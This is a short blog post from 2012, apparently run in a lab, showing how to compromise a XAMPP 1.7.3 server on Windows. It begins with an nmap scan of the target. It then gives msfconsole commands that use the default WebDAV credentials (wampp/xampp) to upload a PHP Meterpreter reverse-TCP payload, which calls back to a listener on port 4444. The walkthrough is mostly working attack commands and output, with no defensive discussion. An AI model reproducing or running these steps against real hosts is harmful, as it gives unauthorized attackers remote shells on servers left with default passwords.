Archive

Posts Tagged ‘windows’

Exploit XMAPP With Metasploit Framework

Czerwiec 29, 2012 1 komentarz

XMAPP For Windows

XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really very easy to install and to use – just download, extract and start.

The distribution for Windows 2000, 2003, XP, Vista, and 7. This version contains: Apache, MySQL, PHP + PEAR, Perl, mod_php, mod_perl, mod_ssl, OpenSSL, phpMyAdmin, Webalizer, Mercury Mail Transport System for Win32 and NetWare Systems v3.32, Ming, FileZilla FTP Server, mcrypt, eAccelerator, SQLite, and WEB-DAV + mod_auth_mysql.

xampp_for_win

XAMPP For Windows

Nmap Scan:

root@bt:~# nmap -sS -T4 -A 192.168.235.1

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-28 11:52 EDT
Nmap scan report for 192.168.235.1
Host is up (0.00049s latency).
Not shown: 990 filtered ports
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.2.14 ((Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1)
|_http-methods: No Allow or Public header in OPTIONS response (status code 302)
| http-title:             XAMPP            1.7.3
|_Requested resource was http://192.168.235.1/xampp/
135/tcp  open  msrpc       Microsoft Windows RPC
139/tcp  open  netbios-ssn
443/tcp  open  ssl/http    Apache httpd 2.2.14 ((Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10 23:48:47
|_Not valid after:  2019-11-08 23:48:47
|_http-methods: No Allow or Public header in OPTIONS response (status code 302)
|_sslv2: server still supports SSLv2
| http-title:             XAMPP            1.7.3
|_Requested resource was https://192.168.235.1:443/xampp/

We can use XAMPP WebDAV PHP Upload exploit.

This module exploits weak WebDAV passwords on XAMPP servers. It uses supplied credentials to upload a PHP payload and execute it.

Open msfconsole and type:

msf >use exploit(xampp_webdav_upload_php)

msf>set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf  exploit(xampp_webdav_upload_php) > show options

Module options (exploit/windows/http/xampp_webdav_upload_php):

Name      Current Setting  Required  Description
—-      —————  ——–  ———–
FILENAME                   no        The filename to give the payload. (Leave Blank for Random)
PATH      /webdav/         yes       The path to attempt to upload
Proxies                    no        Use a proxy chain
RHOST     192.168.235.1    yes       The target address
RPASS     xampp            yes       The Password to use for Authentication
RPORT     80               yes       The target port
RUSER     wampp            yes       The Username to use for Authentication
VHOST                      no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

Name   Current Setting  Required  Description
—-   —————  ——–  ———–
LHOST  192.168.244.128  yes       The listen address
LPORT  4444             yes       The listen port

And exploit:

xampp exploit

Xampp Exploit

We’re home.

Source: